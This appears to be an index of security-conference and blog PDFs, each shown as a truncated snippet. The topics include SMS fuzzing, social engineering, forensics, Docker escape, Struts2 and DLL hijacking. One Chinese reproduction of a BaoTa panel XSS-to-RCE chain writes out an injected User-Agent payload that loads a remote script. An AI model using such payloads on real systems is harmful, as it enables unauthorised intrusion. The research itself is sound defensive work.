Blowing up the Celly Building Your Own SMS/MMS Fuzzer Brian Gorenc, Manager, Vulnerability Research Matt Molinyawe, Security Researcher © Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 2 Agenda •  Introduction •  Bug Hunting •  Te...
pdf
The Science of Social Engineering Mike Murray / Anton Chuvakin mmurray@episteme.ca anton@chuvakin.org NLP, Hypnosis and The Science of Persuasion Outline ✴ The Basics ✴ Social Engineering and Persuasion ✴ The Language of Influence ✴ Framing - Context over Content ✴ Hypnosis ✴ The art of communication ✴ Putting it a...
pdf
Hacking E.S.P. Hacking E.S.P. Disclaimer Disclaimer The views and opinions expressed in this The views and opinions expressed in this presentation are solely those of the presentation are solely those of the speakers and do not necessarily reflect speakers and do not necessarily reflect opinions of their employ...
pdf
數位鑑識與資料救援前瞻性研究 主講人: thx (張道弘) 1 什麼是數位鑑識? 數位鑑識也稱為電腦鑑識,是一門有效解 決資通安全與電腦犯罪難題的科學。 其定義為:以一定程序保存、識別、抽 取、記載及解讀電腦或網路媒體 ...。 數位鑑識以及偵查的方式,在案件的偵 查,透過軟體並有流程,拿取一些儲存於 儲存裝置,可有助於案情釐清以及曝光。 2 司法單位所用的儲存媒體鑑識技術 使用:Encase,Winhex,R-Studio, FTK imager ,Helix Live CD純軟體 做邏輯區分析處理。 資料讀取出來,純做數值運算,撈取資料 如果是主流 File System 現行商用軟體已 非...
pdf
Instrumenting Point-of-Sale Malware A Case Study in Communicating Malware Analysis More Effectively Robert Wesley McGrew, Ph.D. Assistant Research Professor Department of Computer Science and Engineering Distributed Analytics & Security Institute (DASI)
 Mississippi State University July 13, 2014 ! ABSTRACT ! T...
pdf
DevSecOps 2020 Dev Sec Ops FreeBuf 咨询荣誉出品 D e v S e c O p s 企 业 实 践 白 皮 书 关于安全聚合力系列 独行难、众行远。安全聚合力系列报告旨在凝聚网络安全业内甲方安全专家,共同产出指导性、前瞻性的技术及行业实践 研究报告,为企业提供更详实、更易落地的同行业安全建设参考。 关于报告 DevSecOps作为安全领域中逐渐步入成熟期的技术体系,从最初的理念到如今少量的成功实践案例,中间经历了大量的 探索与发展。如今,很多企业已经意识到DevSecOps的重要性并想要有所实践,但仍然面临大量挑战。 本次FreeBuf咨询邀请《研发运营一体化(DevOps)能力成熟度模型》部...
pdf
© Caendra Inc. 2020 All Rights Reserved Web Application Penetration Testing eXtreme Encod%69ng and /^Filtering$/ S e c t i o n 0 1 | M o d u l e 0 1 WAPTXv2: Section 1, Module 1 - Caendra Inc. © 2020 Table of Contents MODULE 01 | ENCOD%69NG AND /^FILTERING$/ 1.1 Data Encoding Basics 1.2 Filtering Basics | p.2 ...
pdf
准备工作: 找到网站名 JS payload 复现过程: 此时的 wwwroot 目录下面是没有文件的 发包 User-Agent: </tExtArEa>"><script src=http://URL/1.js></script> 点击网站日志 成功 RCE 原理分析 这里我用的环境是 7.9.1 版 目前的官网最新版也是 7.9.1 版本 复现流程可以看出来是 xss+后台 RCE 的组合拳 首先是 xss,我们可以看到日志可以成功用</textarea>闭合,然后就是经典的 script src 分析源码,看看宝塔是如何读取日志的 这里有一个 getsitelogs 函数,其中获取了网站的日志路...
pdf
一、判断是否在docker容器里 首先,我们需要先判断是否在docker环境里,常用的两个检测方式: 目前来说,这两种检测方式还是比较有效的,其他检测方式,如检测mount、fdisk -l查看硬盘 、判断PID 1的进程名 等也可用来辅助判断。 二、配置不当引发的docker逃逸 2.1 docker remote api未授权访问 漏洞简述:docker remote api可以执行docker命令,docker守护进程监听在0.0.0.0,可直接调用API来操作 docker。 通过docker daemon api 执行docker命令。 漏洞利用: A、新运行一个容器,挂载点设置为服务器的根目录挂载至/mnt目录下。 B、...
pdf
Vmware CB Workload 360 政企安全 Skay-2021.9.14 2 Vmware CB workload 3 查看分别监听了哪些端口 端口的启动文件 全局搜索jar class 确定工作目录 Vmware CB worktaion 4 Vmware CB workload 拿到手后是一个ova文件,直接导入vmware 改ssh配置文件root登录,/opt/vmware 为工作目录,配置及启动文件也在这里 调试:三个springboot jar包 分别配置远程调试 Vmware CB workload 5 工作目录打包扒下来,对jar包配置远程调试 tar czvf test.tar.gz * ...
pdf
Hacking Sleep: How to Build Your Very Own Sleep Lab Ne0nRa1n & Keith Biddulph present... Human Sleep Sleep is a normal state of rest that is characterized by unconsciousness, reduced activity, and limited sensory responsiveness Sleep differs from other states of reduced consciousness such as drug intoxication or co...
pdf
SOCIAL ZOMBIES Your Friends Want to Eat Your Brains STARRING... TOM ESTON KEVIN JOHNSON Social Networks “The New Hotness” 225 Million Users 110 Million Users Grew 752% in 2008! 8 million visitors in march 2009 “Social networks & Blogs are now the 4th most popular online activity, ahead of personal email.” -Nielsen ...
pdf
1 OLONNONS-我⽤NL年前的技巧拿了⼀个shell 在分析完 log4shell 对于struts2的影响后,感觉struts2框架写的有点xxx,由于⼿上正好有⼏个 struts2打 log4shell 不成功,于是准备先看看其历史漏洞然后在挖挖看。 在看struts2历史漏洞时发现空虚浪⼦⼼前辈以前挖过不少struts2的漏洞于是在他博客看了他的很多⽂章 博客(看⾃闭了),发现他提到的⼀个判断struts2的⽅法。 通过在正常的Action后添加参数 ?ActionErrors=xxx 会返回404⻚⾯。 Struts2⾥的Action都继承⾃ ActionSupport 0x01 前⾔ 0x01 判断st...
pdf
/ register_argc_argv boolean Tells PHP whether to declare the argv & argc variables (that would contain the GET information). See also command line. register_argc_argv TRUE Setting this to TRUE means that scripts executed via the CLI SAPI always have access to argc (number of arguments passed to the application) and a...
pdf
老司机独家代码审计姿势 --色豹 目录 代码审计介绍 代码审计流程思路 web应用代码审计 IOT固件代码审计 1 2 3 4 代码审计介绍 代码审计(Code audit)是一种以发 现程序错误,安全漏洞和违反程序规 范为目标的源代码分析。 什么是代码审计? 代码审计工具 Fortify SCA Checkmarx CxSuite RIPS 厂商 Fortify Software Checkmarx rips 支持语言 Java,JSP,ASP.NET,C#, VB.NET,C,C++,COB OL, ColdFusion,Transac t-...
pdf
Let’s Sink The Phishermen’s Boat! Teo Sze Siong, <teo.sze.siong@f-secure.com> F-Secure Corporation Sunday, June 29, 2008 Page 2 Why this topic? • Internet banking has become more and more preferred choice • Yet, many people don't understand the risk they are facing in online banking • Keep antivirus software updated ...
pdf
DEFCON30 | 拯救环境变量 收录于合集 #红队 18个 通过在进程级别操纵环境变量,可以让受信任的应⽤程序加载任意 DLL 并执⾏恶意代 码。这篇⽂章列出了近 100 个在 Windows 11 (21H2) 上易受此类 DLL 劫持的可执⾏⽂ 件;它演示了如何仅⽤三⾏ VBScript 就可以实现这⼀点。 环境变量 环境变量是在 1970 年代后期在 Unix V7 [ 1 , p.99-101 ] 中引⼊的,作为将信息传递给进程的 ⼀种简单⽅法。事实证明它很受欢迎:⼏年后它也被 PC DOS 2.0 [ 2 , p.477 ] 采⽤,最终演 变成 Windows 操作系统。⼤约四⼗年后,环境变量仍然存在于 Windows...
pdf
Information Classification: General Scaling the Security Researcher to Eliminate OSS Vulnerabilities Once and for All - Jonathan Leitschuh - - Patrick Way - Information Classification: General - Jonathan Leitschuh - Software Engineer & Security Researcher Dan Kaminsky Fellowship @ HUMAN Security GitHub Star & GitHub Se...
pdf
A Atttt SSaattaann m myy FFrriieenn ttttaacckkiinngg SSoocc :::: D DeeffCCoonn SSiixxtteeee SShhaaw wnn M M aanndd N Naatthhaann H H n iiss oonn nnddss LLiisstt :: cciiaall N Neettw woorrkk eenn ((FFTTM MFFW W)) :::: M Mooyyeerr dd H Haam miieell kkss "Has what we've learned about writin...
pdf
@EyalItkin Mystery Callback No size check: Classic Buffer Overflow 0x000022B6 0x000022B6 Compromised Camera Firmware Update Compromised Camera Firmware Update Compromised Camera Firmware Update Plain Firmware Compromised Camera Firmware Update Plain Firmware Malicious Firmware Compromised Camera Firmware Update...
pdf
1 BRING YOUR OWN PRINT DRIVER VULNERABILITY Jacob Baines 7 August 2021 2 AGENDA Background Research Print Driver Installation BYOPD Exploitation Detection & Mitigations 3 SLIDES & CODE AVAILABLE https://github.com/jacob-baines/concealed_position 4 SPEAKER INTRODUCTION Jacob Baines Vulnerability Researcher @Juni...
pdf
An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets James Kirk Outline • Background • DOD Agency Responsible for Interpretation and Enforcement • Security Control Development • Document Drafting and Approval • Testing of Security...
pdf
Fun with SOHO Router 101 by Jhe@HITCON-CMT Who am I ? ● Jhe ● Co-founder of UCCU ● know a little ○ Web security ○ Binary exploitation ○ Parseltongue (python) Firmware overview Reversing engineering Common vulnerabilities Real world case UCCU What is SOHO Router Firmware overview Reversing engineering Common vulnerabi...
pdf
一个很有意思的shellcode执行方式 前言 好久没更文了,最近事情比较多.在日常看样本的时候看到了一个Lazarus所使用的新型Macro植入物.其还 是该组织第一次使用的相关技术感觉比较少见而且很有意思。虽然技术不是一个很先进的技术但是在宏 的利用中却有一定的可能.还是可以多多学习用于RedTeam的工作中的 Macro宏分析 前面的导出声明部分: Private Declare PtrSafe Function WMCreateBackupRestorer Lib "Crypt32" _    Alias "CryptStringToBinaryW" (ByVal WmBckupParam1 As LongPtr, ByV...
pdf